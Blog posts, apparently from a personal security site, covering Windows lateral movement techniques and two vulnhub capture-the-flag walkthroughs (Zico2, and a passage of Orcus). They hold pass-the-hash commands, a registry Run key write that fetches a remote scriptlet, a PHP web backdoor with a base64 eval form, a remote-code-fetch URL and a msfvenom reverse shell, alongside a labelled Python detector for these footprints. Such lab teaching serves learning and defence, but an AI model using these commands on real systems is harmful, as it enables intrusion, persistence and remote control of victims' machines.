Monday, November 6, 2017

Windows Lateral Movement Fu

In this post I'm going to detail Windows lateral movement tools, techniques and procedures (TTPs). Wikipedia defines lateral movement as techniques cyber attackers, or "threat actors", use to progressively move through a network as they search for the key data and assets that are ultimately the target of their attack campaigns. This definition is a bit too broad, as it would entail everything done by a threat actor between attaining a foothold and exfiltration of data. The main focus of this post is the ways an attacker could gain code execution on other systems on a victim network once they have an initial foothold or a valid set of credentials. These credentials could be stolen from centralized software installation systems, keyloggers, ARP spoofing, network sniffing or password dumping toys like Pwdump, Windows Credential Editor (WCE), Mapiget, Lslsass, Gsecdump, CacheDump, Mimikatz, etc.

The PowerShell era gave attackers a native way of interacting with the Windows core without having to use compiled code, as well as an interactive .NET playground. Some of the techniques below can be achieved with or without PowerShell. I'll try to highlight ways of achieving the same task with PowerShell wherever possible.

The following set of techniques assumes the attacker has a valid set of credentials/hashes and/or a command shell on the target network. I'll start with every pentester's favorite lateral movement technique.

1.  PsExec

This tool is usually run after using Mimikatz to dump credentials from memory. What makes it really amazing is that the binary is Microsoft signed, although some AVs do flag it. Of course Microsoft's implementation of this tool doesn't support using hashes for authentication. Metasploit's and Impacket's implementations of this tool allow us to use both hashes (NTLM) and clear-text credentials, whichever you can get your hands on.



The Metasploit way

Metasploit has its own implementation of the same. This one allows us to pass the hash if we don't have the clear-text credentials.




Note that Metasploit has two implementations of the psexec module, a legacy one and a PowerShell version. I've found the PowerShell version to be more reliable.

Impacket way

psexec.py awenger@192.168.83.129 -hashes E41905232DC05746E5E55D3FD61BC4D6:D53E2D187CAAF9D607133D3DAFC3C3F1




2.  Windows Management Instrumentation (WMI)

WMI is the infrastructure for management data and operations on Windows-based operating systems. WMI enables devices and systems in a network to be managed and controlled centrally. This is another attacker favorite since it's enabled by default and doesn't require any additional toys on the compromised system. With it you can basically execute code on a remote system.



We can see the notepad process has been executed on the target system.



Now let's try something more evil.



Back in our Metasploit we get a reverse shell.



In case you don't know how I generated the rev_https.sct file, google subtee's "Bypass Application Whitelisting Script Protections".

Impacket

Like psexec.py, Impacket has a toy you can run directly from Kali that takes both hashes and plain-text passwords.

wmiexec.py awenger@192.168.83.129 -hashes E41905232DC05746E5E55D3FD61BC4D6:D53E2D187CAAF9D607133D3DAFC3C3F1



Powershell

Note that with newer versions of Windows, i.e. 2012+, WMIC is deprecated. PowerShell provides the same functionality with the Invoke-WmiMethod cmdlet. So let's see what Invoke-WmiMethod can do for us.

Let's first generate the payload.



Set up our Metasploit handler.



We can see that we got a reverse connection on execution.



Powersploit also has its own WMI implementation called Invoke-WmiCommand. I'll leave that one as an exercise to those following along.

3.  Windows Remote Management (WinRM)

Microsoft defines Windows Remote Management as a remote management service that allows hardware and operating systems from different vendors to interoperate. WinRM is the server part of the application and WinRS (Windows Remote Shell) is the client part. The service has to be enabled on both systems for it to work. We'll use the WinRS tool when running commands on the target system. Windows Remote Management isn't enabled by default, but when it is, it has the look and feel of the psexec binary. It's relatively trivial to use: you basically have a shell on the target system. If the boxes are in an Active Directory environment, there's no need to provide credentials since the machines have Kerberos trust between them.



My test machines are domain joined; if you want to try these out without domain joining the boxes, check out this link.

There are a number of PowerShell implementations of Windows Remote Management. We're going to see some of them in action. Invoke-Command and the PSSession commands are more or less the same; the main difference between them is that the former can be unleashed on multiple boxes with a single command while PSSession can only run on one box.

Invoke-Command



Note: The download cradle was obfuscated by Daniel Bohannon's Invoke-CradleCrafter

Invoke-Command is quite flexible; you can give it a path to a file to execute on the remote system. As with all built-in PowerShell commands, Get-Help is your friend.

PSSession

Let's see what the PSSession commands can do for us.



A variation of the PSSession set of commands is Enter-PSSession; you can guess from the name that it gives you an interactive session on the target machine. As you know, Metasploit and interactive sessions don't play well together, so I'll run it from a Windows box.



We can even mix it up to run commands on the target system.



4.  Service Control (SC)

SC.exe is a built-in Windows utility that retrieves and sets control information about services. It's a small but powerful utility that can start, stop and interact with Windows services, and the fact that it can be used to control other systems' services remotely makes it an interesting tool for lateral movement. Using a normal exe binary with sc will cause it to die immediately after execution, because a plain executable never reports back to the Service Control Manager. This means we have to generate a binary that's capable of responding to service control commands. Lucky for us, Metasploit can generate such binaries. The downside is that it'll probably be flagged by AV since all Metasploit containers are deemed dangerous. You'll have to modify the binary to evade AV. AV evasion is beyond the scope of this post, but you can read more on how to do it from here and here.





Let's transfer our shiny new evil binary to the system we control.



We'll check to make sure the service we're trying to create doesn't exist before we actually create it.



5.  Scheduled Tasks

This technique is super flexible: you can schedule the task to run on an event trigger, for example on system logon, and you can fine-tune it to run on the days of your choice. This also makes it a potent persistence technique. The catch of course is that it requires admin rights on the target system.



For good opsec we'll remove the scheduled task and also check to make sure it has been removed.



6.  AT

This is the younger brother of scheduled tasks. It's not as powerful as scheduled tasks, but for what we want to accomplish it's sufficient. You can schedule commands and programs to run on a computer at a specified time and date.



7.  MMC20.Application DCOM

All the other techniques discussed in this post have been around for an eternity. This next one was discovered / made public by enigma0x3. It takes advantage of the fact that the Distributed Component Object Model (DCOM) has the ability to interact with objects over the network. He gives a detailed account of how he enumerated the objects and eventually got code execution in his blog post here. He has variations on this technique where he abuses MS Office to achieve code execution; read about it here. I advise everyone starting out to read this guy's whole website.



We get an Empire reverse shell.



8.  RDP

Well, the RDP protocol is as old as time. Its syntax is pretty straightforward.




9.  Remote File Access

The next couple of techniques require the compromised system to have read-write file permissions on the entire root drive of another system. We have to wait for the targeted system to be restarted, then we can get our reverse shell. This can also double as a persistence technique unless you explicitly remove the uploaded trojan.

Robocopy




Xcopy

This is the younger brother of robocopy. Only the syntax changes; the functionality remains the same. You can read more about it here.




There are variations to this technique in that you can leverage DLL hijacking or plant DLLs at specific locations to get code execution. These techniques can even double as privilege escalation techniques depending on folder permissions and Windows version. More information on how that can be achieved is available here.

10.  Remote Registry Access / Manipulation

Writing to any of these registry keys will trigger code execution. These locations are also malware favorites for persistence. HKCU can be substituted for HKLM; the only difference is that HKCU entries execute in the context of the current user (the one whose hive you wrote to), while HKLM entries execute in the context of whoever logs on.

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

REG ADD \\192.168.83.129\HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v evilkey /t REG_SZ /d "regsvr32 /s /n /u /i:http://192.168.83.175/Expendable/rev_https.sct scrobj.dll"
REG QUERY \\192.168.83.129\HKLM\Software\Microsoft\Windows\CurrentVersion\Run
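Detection logic for the footprints the PsExec, SC, scheduled task/AT and registry Run key techniques above leave on the target, as an added example that is not part of the original post. It runs over constructed, flattened Windows event records (System log 7045 service installs for PsExec's PSEXESVC and the sc.exe technique, Security log 4698 for task creation, Security log 4657 for writes to the Run keys listed above) and flags the regsvr32 scrobj.dll pattern from this section and PowerShell download cradles. Hostnames, service names and all records are made up; 4657 only exists if an audit SACL is set on those keys, which is assumed here.

```python
import re

# Registry autorun locations from the section above, matched as suffixes so HKLM and HKCU both count.
AUTORUN_KEYS = (
    r"software\microsoft\windows\currentversion\run",
    r"software\microsoft\windows\currentversion\runonce",
    r"software\microsoft\windows\currentversion\policies\explorer\run",
    r"software\microsoft\windows nt\currentversion\winlogon",
)

# Command-line shapes that recur across the techniques: the regsvr32 scriptlet fetch
# (the rev_https.sct trick) and PowerShell download cradles / encoded commands.
SUSPICIOUS_CMD = re.compile(
    r"regsvr32(\.exe)?.*?/i:https?://.*?scrobj\.dll"
    r"|powershell(\.exe)?.*?(-enc(odedcommand)?\s|downloadstring|\biex\b|invoke-expression)",
    re.IGNORECASE,
)
# Directories a legitimately installed service binary normally lives under.
TRUSTED_SERVICE_DIRS = re.compile(
    r'^"?(%systemroot%|%windir%|c:\\windows|c:\\program files( \(x86\))?)\\', re.IGNORECASE)
# Locations any user can write to: a dropped service binary or autorun target usually lands here.
USER_WRITABLE = re.compile(r"\\temp\\|\\users\\public\\|\\appdata\\local\\temp\\", re.IGNORECASE)


def check_service_install(ev):
    """System log 7045 (service installed): PsExec's PSEXESVC and the sc.exe technique."""
    findings = []
    path = ev["ImagePath"]
    if ev["ServiceName"].upper() == "PSEXESVC":
        findings.append("PsExec service installed")
    if SUSPICIOUS_CMD.search(path):
        findings.append("service image path runs a script/LOLBin")
    elif USER_WRITABLE.search(path) or not TRUSTED_SERVICE_DIRS.match(path):
        findings.append("service binary in an untrusted or user-writable location")
    return findings


def check_task_created(ev):
    """Security log 4698 (scheduled task created): covers both schtasks and AT."""
    if SUSPICIOUS_CMD.search(ev["Command"]):
        return ["scheduled task runs a script/LOLBin"]
    return []


def check_registry_write(ev):
    """Security log 4657 (registry value modified). Assumes an audit SACL on the autorun keys."""
    obj = ev["ObjectName"].lower()
    if not any(obj.endswith(key) for key in AUTORUN_KEYS):
        return []
    value = ev["NewValue"]
    if SUSPICIOUS_CMD.search(value):
        return ["autorun key set to a script/LOLBin command"]
    if USER_WRITABLE.search(value):
        return ["autorun key points into a temp or user-writable location"]
    return []


HANDLERS = {7045: check_service_install, 4698: check_task_created, 4657: check_registry_write}


def detect(events):
    """Run every rule over a list of event dicts; returns (host, event id, finding) triples."""
    alerts = []
    for ev in events:
        handler = HANDLERS.get(ev["EventID"])
        for finding in (handler(ev) if handler else []):
            alerts.append((ev["Host"], ev["EventID"], finding))
    return alerts


def hosts_with_multiple_techniques(alerts):
    """Hosts where more than one distinct event type fired: the strongest signal of the set."""
    seen = {}
    for host, event_id, _ in alerts:
        seen.setdefault(host, set()).add(event_id)
    return {host for host, ids in seen.items() if len(ids) > 1}


# Constructed sample events in flattened form (not real telemetry); hostnames are made up.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Host": "WS01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 7045, "Host": "WS02", "ServiceName": "updatesvc",
     "ImagePath": r"C:\Windows\Temp\svc9999.exe"},
    {"EventID": 7045, "Host": "WS03", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 7045, "Host": "WS04", "ServiceName": "helper",
     "ImagePath": r"%COMSPEC% /c regsvr32 /s /n /u /i:http://192.168.83.175/Expendable/rev_https.sct scrobj.dll"},
    {"EventID": 4698, "Host": "WS02", "TaskName": r"\Updater",
     "Command": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4 (truncated, constructed)"},
    {"EventID": 4698, "Host": "WS05", "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "Command": r"%windir%\system32\defrag.exe -c -h -o -$"},
    {"EventID": 4657, "Host": "WS02", "ObjectValueName": "evilkey",
     "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "NewValue": "regsvr32 /s /n /u /i:http://192.168.83.175/Expendable/rev_https.sct scrobj.dll"},
    {"EventID": 4657, "Host": "WS06", "ObjectValueName": "OneDrive",
     "ObjectName": r"\REGISTRY\USER\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run",
     "NewValue": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"EventID": 4624, "Host": "WS06"},  # unrelated logon event: ignored
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Running it prints five alerts; WS02 is the only host where a service install, a task creation and a Run key write all fired, which is the pattern worth escalating.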




-Pass the ticket

References

https://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf
https://www.scriptjunkie.us/2013/02/authenticated-remote-code-execution-methods-in-windows/
https://posts.specterops.io/lateral-movement-using-excel-application-and-dcom-enigma0x3-on-wordpress-com-d11d56e504dc
http://www.fuzzysecurity.com/tutorials/19.html


Wednesday, October 11, 2017

Owning Zico2

Over the past week, vulnhub dropped about 20 wargames. I decided to try my hand at a couple. I'll be blogging as I solve them, assuming time allows. This is my walkthrough for the Zico2 CTF.

After loading the VM into VMware, I scanned with nmap. Port 80 as usual appeared to be the most interesting, so I fired up nikto and then dirsearch in that order.
root@kali:/tmp# nmap -sT -A -PO -n -v 192.168.83.133
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-09 09:39 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating ARP Ping Scan at 09:40
Scanning 192.168.83.133 [1 port]
Completed ARP Ping Scan at 09:40, 0.22s elapsed (1 total hosts)
Initiating Connect Scan at 09:40
Scanning 192.168.83.133 [1000 ports]
Discovered open port 22/tcp on 192.168.83.133
Discovered open port 80/tcp on 192.168.83.133
Discovered open port 111/tcp on 192.168.83.133
Completed Connect Scan at 09:40, 0.03s elapsed (1000 total ports)
Initiating Service scan at 09:40
Scanning 3 services on 192.168.83.133
Completed Service scan at 09:40, 6.15s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.83.133
adjust_timeouts2: packet supposedly had rtt of -175891 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -175891 microseconds. Ignoring time.
NSE: Script scanning 192.168.83.133.
Initiating NSE at 09:40
Completed NSE at 09:40, 0.29s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.01s elapsed
Nmap scan report for 192.168.83.133
Host is up (0.00053s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico's Shop
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 35817/udp status
|_ 100024 1 49910/tcp status
MAC Address: 00:0C:29:A2:5A:63 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Uptime guess: 198.046 days (since Sat Mar 25 08:33:47 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 192.168.83.133
NSE: Script Post-scanning.
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.23 seconds
Raw packets sent: 36 (2.850KB) | Rcvd: 32 (2.322KB)
root@kali:~/dirsearch# nikto -h http://192.168.83.133
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.83.133
+ Target Hostname: 192.168.83.133
+ Target Port: 80
+ Start Time: 2017-10-09 09:40:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 3803593, size: 7970, mtime: Thu Jun 8 15:18:30 2017
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26
+ 8346 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2017-10-09 09:40:49 (GMT-4) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~/dirsearch# ./dirsearch.py -u http://192.168.83.133/ -e php 

 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 5992

Error Log: /root/dirsearch/logs/errors-17-10-09_09-50-00.log

Target: http://192.168.83.133/

[09:50:00] Starting: 
[09:50:02] 403 -  286B  - /.hta
[09:50:02] 403 -  293B  - /.ht_wsr.txt
[09:50:02] 403 -  297B  - /.htaccess-local
[09:50:02] 403 -  295B  - /.htaccess-dev
[09:50:02] 403 -  295B  - /.htaccess.BAK
[09:50:02] 403 -  297B  - /.htaccess-marco
[09:50:02] 403 -  295B  - /.htaccess.old
[09:50:02] 403 -  296B  - /.htaccess.bak1
[09:50:02] 403 -  298B  - /.htaccess.sample
[09:50:02] 403 -  296B  - /.htaccess.orig
[09:50:02] 403 -  296B  - /.htaccess.save
[09:50:02] 403 -  295B  - /.htaccess.txt
[09:50:02] 403 -  297B  - /.htaccess_extra
[09:50:02] 403 -  296B  - /.htaccess_orig
[09:50:02] 403 -  294B  - /.htaccessBAK
[09:50:02] 403 -  295B  - /.htaccessOLD2
[09:50:02] 403 -  294B  - /.htaccessOLD
[09:50:03] 403 -  294B  - /.htaccess_sc
[09:50:03] 403 -  292B  - /.htaccess~
[09:50:03] 403 -  290B  - /.htgroup
[09:50:03] 403 -  295B  - /.htpasswd-old
[09:50:03] 403 -  296B  - /.htpasswd_test
[09:50:03] 403 -  290B  - /.htusers
[09:50:03] 403 -  292B  - /.htpasswds
[09:50:18] 403 -  290B  - /cgi-bin/
[09:50:21] 301 -  314B  - /css  ->  http://192.168.83.133/css/
[09:50:21] 301 -  318B  - /dbadmin  ->  http://192.168.83.133/dbadmin/
[09:50:21] 200 -  917B  - /dbadmin/
[09:50:22] 403 -  286B  - /doc/
[09:50:22] 403 -  301B  - /doc/en/changes.html
[09:50:22] 403 -  300B  - /doc/stable.version
[09:50:24] 200 -    3KB - /gulpfile.js
[09:50:25] 301 -  314B  - /img  ->  http://192.168.83.133/img/
[09:50:25] 200 -    8KB - /index
[09:50:26] 200 -    8KB - /index.html
[09:50:27] 301 -  313B  - /js  ->  http://192.168.83.133/js/
[09:50:27] 200 -    1KB - /LICENSE
[09:50:34] 200 -  789B  - /package.json
[09:50:34] 200 -  789B  - /package
[09:50:38] 200 -    1KB - /README.md 
[09:50:40] 403 -  295B  - /server-status
[09:50:40] 403 -  296B  - /server-status/
[09:50:44] 200 -    8KB - /tools
[09:50:45] 200 -    0B  - /view.php

Task Completed
The dbadmin folder obviously looked the most interesting, so I quickly browsed it. This in turn led me to http://192.168.83.133/dbadmin/test_db.php. At the prompt I logged in with the default credentials of admin. I then searched for existing vulnerabilities in phpliteadmin.


At this point I tried to follow along with what the advisory said but was a little handicapped since the screenshots were no longer up.
The screenshots below show how I managed to execute code on the Zico2 box.




Click "Go"



Fill in as shown in the screenshot (under the Default Value field put <?php phpinfo()?> as in the advisory), then click "Create".
You should be greeted with a message showing that the table was successfully created, as in the screenshot below.



After that click on "/usr/databases/test.php", then click the "Rename Database" tab.



I chose that folder (dbadmin) since that's the location of the default test_db.php file.
At this point, browsing to http://192.168.83.133/dbadmin/west.php, we should have the phpinfo page displayed to us as in the screenshot below.



Now we know we have code execution. The next step is to upload something more evil like a command shell. When I directly uploaded a command shell it didn't work, so I base64 encoded it.
The steps for uploading are the same as above, with the small difference of base64 encoding it.

root@kali:/tmp# cp /usr/share/webshells/php/simple-backdoor.php .


Modify it and remove the PHP tags so it looks like the below.

root@kali:/tmp# cat simple-backdoor.php 
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
Now base64 encode it:
root@kali:/tmp# msfvenom -p generic/custom -e php/base64 -f raw PAYLOADFILE=simple-backdoor.php
No platform was selected, choosing Msf::Module::Platform from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 226 (iteration=0)
php/base64 chosen with final size 226
Payload size: 226 bytes
eval(base64_decode(aWYoaXNzZXQoJF9SRVFVRVNUWydjbWQnXSkpewogICAgICAgIGVjaG8gIjxwcmU.chr(43).IjsKICAgICAgICAkY21kID0gKCRfUkVRVUVTVFsnY21kJ10pOwogICAgICAgIHN5c3RlbSgkY21kKTsKICAgICAgICBlY2hvICI8L3ByZT4iOwogICAgICAgIGRpZTsKfQoK));

Paste the resulting code into the default value field.

<?php <base64 encoded code goes here without the angle brackets :-)> ?>



As before, rename the database to whatever you like; I named mine bd.php. We should now have a functional shell.



However this shell is a little limited so we'll use metasploit to get a better shell.


http://192.168.83.133/dbadmin/bd.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval%28file_get_contents%28%27http://192.168.83.175:8081/RwdifigI%27%29%29;%22
# I didn't like this shell either since it kept dying on me.
root@kali:/tmp# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.83.175 LPORT=9999 EXITFUNC=thread -a x64 -f elf -o shell9999.elf
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: shell9999.elf
root@kali:/tmp# file shell9999.elf
shell9999.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, corrupted section header size
root@kali:/tmp# cp shell9999.elf /var/www/html/
root@kali:/tmp# nc -lvp 9999
listening on [any] 9999 ...


I downloaded the Linux Exploit Suggester onto the system and the first exploit did the trick. gcc wasn't working well on the victim box, so I compiled the exploit on another box then returned it to the victim box, which gave me a root shell.


Finally I browsed to the root folder and read the flag.txt file. At this point I was obliged to do the rewt dance :-)


Thanks to Rafael and the team over at vulnhub for the challenges.

Monday, March 27, 2017

Solving hackfest2016: Orcus VM

It's taken me a while to pwn this challenge, partly because it runs too many services and web apps and partly due to my lousy attention span. I went down a certain path, burnt about 6 hours only to make no serious progress, and returned to the enumeration phase. Probably my biggest takeaway from this box is to thoroughly map the application before attempting exploitation and avoid skipping around; this helps prevent futile attempts made with limited knowledge.
Enough with the philosophical yadda yaddah.
First I fired up nmap and, as in the previous series, a gazillion services were running.
root@kali:/tmp# nmap -sT -A -PO 172.16.94.136
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-20 14:13 EDT
Nmap scan report for 172.16.94.136
Host is up (0.0055s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp open domain ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php
| /exponent_version.php /getswversion.php /login.php /overrides.php
| /popup.php /selector.php /site_rss.php /source_selector.php
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP STLS CAPA RESP-CODES SASL AUTH-RESP-CODE UIDL PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_ssl-date: ERROR: Script execution failed (use -d to debug)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 50518/udp mountd
| 100005 1,2,3 58138/tcp mountd
| 100021 1,3,4 33074/tcp nlockmgr
| 100021 1,3,4 56493/udp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: ENABLE IMAP4rev1 more have post-login IDLE ID SASL-IR listed capabilities STARTTLS OK LOGINDISABLEDA0001 Pre-login LOGIN-REFERRALS LITERAL+
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_ssl-date: ERROR: Script execution failed (use -d to debug)
443/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: TOP USER CAPA RESP-CODES SASL(PLAIN) AUTH-RESP-CODE UIDL PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_ssl-date: ERROR: Script execution failed (use -d to debug)
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 00:0C:29:74:06:F8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h59m23s, deviation: 0s, median: 2h59m23s
|_nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: \x00
| NetBIOS computer name: ORCUS\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2017-03-20T17:14:14-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 5.48 ms 172.16.94.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.34 seconds

I straight away went to port 80 and fired up nikto and got a mouthful of interesting folders and webapps to follow up. I also fired up dirb to see if I could find any extra folders.
root@kali:/tmp# nikto -h http://172.16.94.136
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.94.136
+ Target Hostname: 172.16.94.136
+ Target Port: 80
+ Start Time: 2017-03-20 14:16:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53ff6086e56aa
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/exponent.js.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.js2.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_bootstrap.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_constants.php' in robots.txt returned a non-forbidden or redirect HTTP code (500)
+ Entry '/exponent_php_setup.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_version.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/getswversion.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/login.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/overrides.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
